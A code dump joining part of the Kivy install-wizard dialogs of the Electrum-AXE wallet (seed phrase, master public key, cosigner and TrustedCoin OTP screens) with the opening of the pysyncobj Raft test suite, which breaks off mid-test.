on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
self.auto_dismiss = False
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
self._trigger_size_dialog = Clock.create_trigger(self._size_dialog)
# note: everything bound here needs to be unbound as otherwise the
# objects will be kept around and keep receiving the callbacks
Window.bind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
self._trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_keyboard(self, instance, key, keycode, codepoint, modifier):
if key == 27:
if self.wizard.can_go_back():
self._on_release = True
self.dismiss()
self.wizard.go_back()
else:
app = App.get_running_app()
if not app.is_exit:
app.is_exit = True
app.show_info(_('Press again to exit'))
else:
self._on_release = False
self.dismiss()
return True
def on_dismiss(self):
Window.unbind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.dismiss()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
self.wizard.terminate(aborted=True)
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_axe.mnemonic import Mnemonic
from electrum_axe.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
def is_valid(x):
try:
return kwargs['is_valid'](x)
except:
return False
self.is_valid = is_valid
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
def protected_on_finished():
try:
on_finished()
except Exception as e:
self.show_error(str(e))
Clock.schedule_once(lambda dt: protected_on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://electrum_axe/gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, *, storage=None, aborted=False):
if storage is None and not aborted:
storage = self.create_storage(self.path)
self.dispatch('on_wizard_complete', storage)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
if force_disable_encrypt_cb:
# do not request PIN for watching-only wallets
run_next(None, False)
return
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
test_syncobj.py
|
from __future__ import print_function
import os
import time
import pytest
import random
import threading
import sys
import pysyncobj.pickle as pickle
import pysyncobj.dns_resolver as dns_resolver
import platform
if sys.version_info >= (3, 0):
xrange = range
from functools import partial
import functools
import struct
import logging
from pysyncobj import SyncObj, SyncObjConf, replicated, FAIL_REASON, _COMMAND_TYPE, \
createJournal, HAS_CRYPTO, replicated_sync, SyncObjException, SyncObjConsumer, _RAFT_STATE
from pysyncobj.syncobj_admin import executeAdminCommand
from pysyncobj.batteries import ReplCounter, ReplList, ReplDict, ReplSet, ReplLockManager, ReplQueue, ReplPriorityQueue
from pysyncobj.node import TCPNode
from collections import defaultdict
logging.basicConfig(format=u'[%(asctime)s %(filename)s:%(lineno)d %(levelname)s] %(message)s', level=logging.DEBUG)
_bchr = functools.partial(struct.pack, 'B')
class TEST_TYPE:
DEFAULT = 0
COMPACTION_1 = 1
COMPACTION_2 = 2
RAND_1 = 3
JOURNAL_1 = 4
AUTO_TICK_1 = 5
WAIT_BIND = 6
LARGE_COMMAND = 7
class TestObj(SyncObj):
def __init__(self, selfNodeAddr, otherNodeAddrs,
testType=TEST_TYPE.DEFAULT,
compactionMinEntries=0,
dumpFile=None,
journalFile=None,
password=None,
dynamicMembershipChange=False,
useFork=True,
testBindAddr=False,
consumers=None,
onStateChanged=None,
leaderFallbackTimeout=None):
cfg = SyncObjConf(autoTick=False, appendEntriesUseBatch=False)
cfg.appendEntriesPeriod = 0.1
cfg.raftMinTimeout = 0.5
cfg.raftMaxTimeout = 1.0
cfg.dynamicMembershipChange = dynamicMembershipChange
cfg.onStateChanged = onStateChanged
if leaderFallbackTimeout is not None:
cfg.leaderFallbackTimeout = leaderFallbackTimeout
if testBindAddr:
cfg.bindAddress = selfNodeAddr
if dumpFile is not None:
cfg.fullDumpFile = dumpFile
if password is not None:
cfg.password = password
cfg.useFork = useFork
if testType == TEST_TYPE.COMPACTION_1:
cfg.logCompactionMinEntries = compactionMinEntries
cfg.logCompactionMinTime = 0.1
cfg.appendEntriesUseBatch = True
if testType == TEST_TYPE.COMPACTION_2:
cfg.logCompactionMinEntries = 99999
cfg.logCompactionMinTime = 99999
cfg.fullDumpFile = dumpFile
if testType == TEST_TYPE.LARGE_COMMAND:
cfg.connectionTimeout = 15.0
cfg.logCompactionMinEntries = 99999
cfg.logCompactionMinTime = 99999
cfg.fullDumpFile = dumpFile
cfg.raftMinTimeout = 1.5
cfg.raftMaxTimeout = 2.5
# cfg.appendEntriesBatchSizeBytes = 2 ** 13
if testType == TEST_TYPE.RAND_1:
cfg.autoTickPeriod = 0.05
cfg.appendEntriesPeriod = 0.02
cfg.raftMinTimeout = 0.1
cfg.raftMaxTimeout = 0.2
cfg.logCompactionMinTime = 9999999
cfg.logCompactionMinEntries = 9999999
cfg.journalFile = journalFile
if testType == TEST_TYPE.JOURNAL_1:
cfg.logCompactionMinTime = 999999
cfg.logCompactionMinEntries = 999999
cfg.fullDumpFile = dumpFile
cfg.journalFile = journalFile
if testType == TEST_TYPE.AUTO_TICK_1:
cfg.autoTick = True
cfg.pollerType = 'select'
if testType == TEST_TYPE.WAIT_BIND:
cfg.maxBindRetries = 1
cfg.autoTick = True
super(TestObj, self).__init__(selfNodeAddr, otherNodeAddrs, cfg, consumers)
self.__counter = 0
self.__data = {}
@replicated
def addValue(self, value):
self.__counter += value
return self.__counter
@replicated
def addKeyValue(self, key, value):
self.__data[key] = value
@replicated_sync
def addValueSync(self, value):
self.__counter += value
return self.__counter
@replicated
def testMethod(self):
self.__data['testKey'] = 'valueVer1'
@replicated(ver=1)
def testMethod(self):
self.__data['testKey'] = 'valueVer2'
def getCounter(self):
return self.__counter
def getValue(self, key):
return self.__data.get(key, None)
def dumpKeys(self):
print('keys:', sorted(self.__data.keys()))
def singleTickFunc(o, timeToTick, interval, stopFunc):
currTime = time.time()
finishTime = currTime + timeToTick
while time.time() < finishTime:
o._onTick(interval)
if stopFunc is not None:
if stopFunc():
break
def utilityTickFunc(args, currRes, key):
currRes[key] = executeAdminCommand(args)
def doSyncObjAdminTicks(objects, arguments, timeToTick, currRes, interval=0.05, stopFunc=None):
objThreads = []
utilityThreads = []
for o in objects:
t1 = threading.Thread(target=singleTickFunc, args=(o, timeToTick, interval, stopFunc))
t1.start()
objThreads.append(t1)
if arguments.get(o) is not None:
t2 = threading.Thread(target=utilityTickFunc, args=(arguments[o], currRes, o))
t2.start()
utilityThreads.append(t2)
for t in objThreads:
t.join()
for t in utilityThreads:
t.join()
def doTicks(objects, timeToTick, interval=0.05, stopFunc=None):
threads = []
for o in objects:
t = threading.Thread(target=singleTickFunc, args=(o, timeToTick, interval, stopFunc))
t.start()
threads.append(t)
for t in threads:
t.join()
def doAutoTicks(interval=0.05, stopFunc=None):
deadline = time.time() + interval
while not stopFunc():
time.sleep(0.02)
t2 = time.time()
if t2 >= deadline:
break
_g_nextAddress = 6000 + 60 * (int(time.time()) % 600)
def getNextAddr(ipv6=False, isLocalhost=False):
global _g_nextAddress
_g_nextAddress += 1
if ipv6:
return '::1:%d' % _g_nextAddress
if isLocalhost:
return 'localhost:%d' % _g_nextAddress
return '127.0.0.1:%d' % _g_nextAddress
_g_nextDumpFile = 1
_g_nextJournalFile = 1
def getNextDumpFile():
global _g_nextDumpFile
fname = 'dump%d.bin' % _g_nextDumpFile
_g_nextDumpFile += 1
return fname
def getNextJournalFile():
global _g_nextJournalFile
fname = 'journal%d.bin' % _g_nextJournalFile
_g_nextJournalFile += 1
return fname
def test_syncTwoObjects():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_singleObject():
random.seed(42)
a = [getNextAddr(), ]
o1 = TestObj(a[0], [])
objs = [o1, ]
assert not o1._isReady()
doTicks(objs, 3.0, stopFunc=lambda: o1._isReady())
o1._printStatus()
assert o1._getLeader().address in a
assert o1._isReady()
o1.addValue(150)
o1.addValue(200)
doTicks(objs, 3.0, stopFunc=lambda: o1.getCounter() == 350)
assert o1._isReady()
assert o1.getCounter() == 350
o1._destroy()
def test_syncThreeObjectsLeaderFail():
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
states = defaultdict(list)
o1 = TestObj(a[0], [a[1], a[2]], testBindAddr=True, onStateChanged=lambda old, new: states[a[0]].append(new))
o2 = TestObj(a[1], [a[2], a[0]], testBindAddr=True, onStateChanged=lambda old, new: states[a[1]].append(new))
o3 = TestObj(a[2], [a[0], a[1]], testBindAddr=True, onStateChanged=lambda old, new: states[a[2]].append(new))
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
assert _RAFT_STATE.LEADER in states[o1._getLeader().address]
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o3.getCounter() == 350)
assert o3.getCounter() == 350
prevLeader = o1._getLeader()
newObjs = [o for o in objs if o._SyncObj__selfNode != prevLeader]
assert len(newObjs) == 2
doTicks(newObjs, 10.0, stopFunc=lambda: newObjs[0]._getLeader() != prevLeader and \
newObjs[0]._getLeader() is not None and \
newObjs[0]._getLeader().address in a and \
newObjs[0]._getLeader() == newObjs[1]._getLeader())
assert newObjs[0]._getLeader() != prevLeader
assert newObjs[0]._getLeader().address in a
assert newObjs[0]._getLeader() == newObjs[1]._getLeader()
assert _RAFT_STATE.LEADER in states[newObjs[0]._getLeader().address]
newObjs[1].addValue(50)
doTicks(newObjs, 10, stopFunc=lambda: newObjs[0].getCounter() == 400)
assert newObjs[0].getCounter() == 400
doTicks(objs, 10.0, stopFunc=lambda: sum([int(o.getCounter() == 400) for o in objs]) == len(objs))
for o in objs:
assert o.getCounter() == 400
o1._destroy()
o2._destroy()
o3._destroy()
def test_manyActionsLogCompaction():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
for i in xrange(0, 500):
o1.addValue(1)
o2.addValue(1)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 1000 and \
o2.getCounter() == 1000 and \
o3.getCounter() == 1000)
assert o1.getCounter() == 1000
assert o2.getCounter() == 1000
assert o3.getCounter() == 1000
assert o1._getRaftLogSize() <= 100
assert o2._getRaftLogSize() <= 100
assert o3._getRaftLogSize() <= 100
newObjs = [o1, o2]
doTicks(newObjs, 10, stopFunc=lambda: o3._getLeader() is None)
for i in xrange(0, 500):
o1.addValue(1)
o2.addValue(1)
doTicks(newObjs, 10, stopFunc=lambda: o1.getCounter() == 2000 and \
o2.getCounter() == 2000)
assert o1.getCounter() == 2000
assert o2.getCounter() == 2000
assert o3.getCounter() != 2000
doTicks(objs, 10, stopFunc=lambda: o3.getCounter() == 2000)
assert o3.getCounter() == 2000
assert o1._getRaftLogSize() <= 100
assert o2._getRaftLogSize() <= 100
assert o3._getRaftLogSize() <= 100
o1._destroy()
o2._destroy()
o3._destroy()
def onAddValue(res, err, info):
assert res == 3
assert err == FAIL_REASON.SUCCESS
info['callback'] = True
def test_checkCallbacksSimple():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]])
o2 = TestObj(a[1], [a[2], a[0]])
o3 = TestObj(a[2], [a[0], a[1]])
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
callbackInfo = {
'callback': False
}
o1.addValue(3, callback=partial(onAddValue, info=callbackInfo))
doTicks(objs, 10, stopFunc=lambda: o2.getCounter() == 3 and callbackInfo['callback'] == True)
assert o2.getCounter() == 3
assert callbackInfo['callback'] == True
o1._destroy()
o2._destroy()
o3._destroy()
def removeFiles(files):
for f in (files):
if os.path.isfile(f):
for i in xrange(0, 15):
try:
if os.path.isfile(f):
os.remove(f)
break
else:
break
except:
time.sleep(1.0)
def checkDumpToFile(useFork):
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0], useFork=useFork)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1], useFork=useFork)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 1.5)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0], useFork=useFork)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1], useFork=useFork)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
def test_checkDumpToFile():
if hasattr(os, 'fork'):
checkDumpToFile(True)
checkDumpToFile(False)
def getRandStr():
return '%0100000x' % random.randrange(16 ** 100000)
def test_checkBigStorage():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
# Store ~50Mb data.
testRandStr = getRandStr()
for i in xrange(0, 500):
o1.addKeyValue(i, getRandStr())
o1.addKeyValue('test', testRandStr)
# Wait for replication.
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr)
assert o1.getValue('test') == testRandStr
o1._forceLogCompaction()
o2._forceLogCompaction()
# Wait for disk dump
doTicks(objs, 8.0)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1])
objs = [o1, o2]
# Wait for disk load, election and replication
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getValue('test') == testRandStr
assert o2.getValue('test') == testRandStr
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
@pytest.mark.skipif(sys.platform == "win32" or platform.python_implementation() != 'CPython', reason="does not run on windows or pypy")
def test_encryptionCorrectPassword():
assert HAS_CRYPTO
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], password='asd')
o2 = TestObj(a[1], [a[0]], password='asd')
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
for conn in list(o1._SyncObj__transport._connections.values()) + list(o2._SyncObj__transport._connections.values()):
conn.disconnect()
doTicks(objs, 10)
o1.addValue(100)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 450 and o2.getCounter() == 450)
assert o1.getCounter() == 450
assert o2.getCounter() == 450
o1._destroy()
o2._destroy()
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_encryptionWrongPassword():
assert HAS_CRYPTO
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], password='asd')
o2 = TestObj(a[1], [a[2], a[0]], password='asd')
o3 = TestObj(a[2], [a[0], a[1]], password='qwe')
objs = [o1, o2, o3]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
